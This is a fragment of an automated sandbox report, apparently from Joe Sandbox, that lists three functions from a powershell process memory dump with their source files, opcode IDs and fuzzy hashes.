                                                      Function 00007FFB4AA96BF3 Relevance: .1, Instructions: 59COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1738154183.00007FFB4AA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AA90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_7ffb4aa90000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 56ac77a6d31e88c959bc0a720225b10dd45b05e63b4b1339ea6c13e4f1b2c918
                                                      • Instruction ID: c2ae455d88e61c8b033b5ff2136011aaabed5e2c5507745ed75253984af184bc
                                                      • Opcode Fuzzy Hash: 56ac77a6d31e88c959bc0a720225b10dd45b05e63b4b1339ea6c13e4f1b2c918
                                                      • Instruction Fuzzy Hash: 24118D6171D5065FE648BF38C4993B972D6EF88310F6404BDE40EC72C3ED5D68464755
                                                      Function 00007FFB4AA94DC5 Relevance: .0, Instructions: 49COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1738154183.00007FFB4AA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AA90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_7ffb4aa90000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 217c858ce824b67f3d56e565de2f76780ec65d5096730a496c2ed47a9d8eed1b
                                                      • Instruction ID: 0b0a3c2fedec5344acbbee8e8f6934a8eb52c89ec280cba423b516c0f4e8a7dc
                                                      • Opcode Fuzzy Hash: 217c858ce824b67f3d56e565de2f76780ec65d5096730a496c2ed47a9d8eed1b
                                                      • Instruction Fuzzy Hash: 3C01677111CB0C4FDB44EF0CE491AB5B7E0FB95364F10056EE58AC3651D636E892CB45
                                                      Function 00007FFB4AA96DB8 Relevance: .0, Instructions: 45COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1738154183.00007FFB4AA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AA90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_7ffb4aa90000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a897b8aeecb881ccfff0b7c38e8bf18a7bc2d711c501df004363016ae2645c54
                                                      • Instruction ID: cc14950613096a31d2f4ccbaf60c0e8f3794927119eae054dca7aa2a917da93c
                                                      • Opcode Fuzzy Hash: a897b8aeecb881ccfff0b7c38e8bf18a7bc2d711c501df004363016ae2645c54
                                                      • Instruction Fuzzy Hash: 7B11486244E7C54FD7075B7458A5591BFB4AE03210B0E8AEBC4D9CF0A3E248595AC763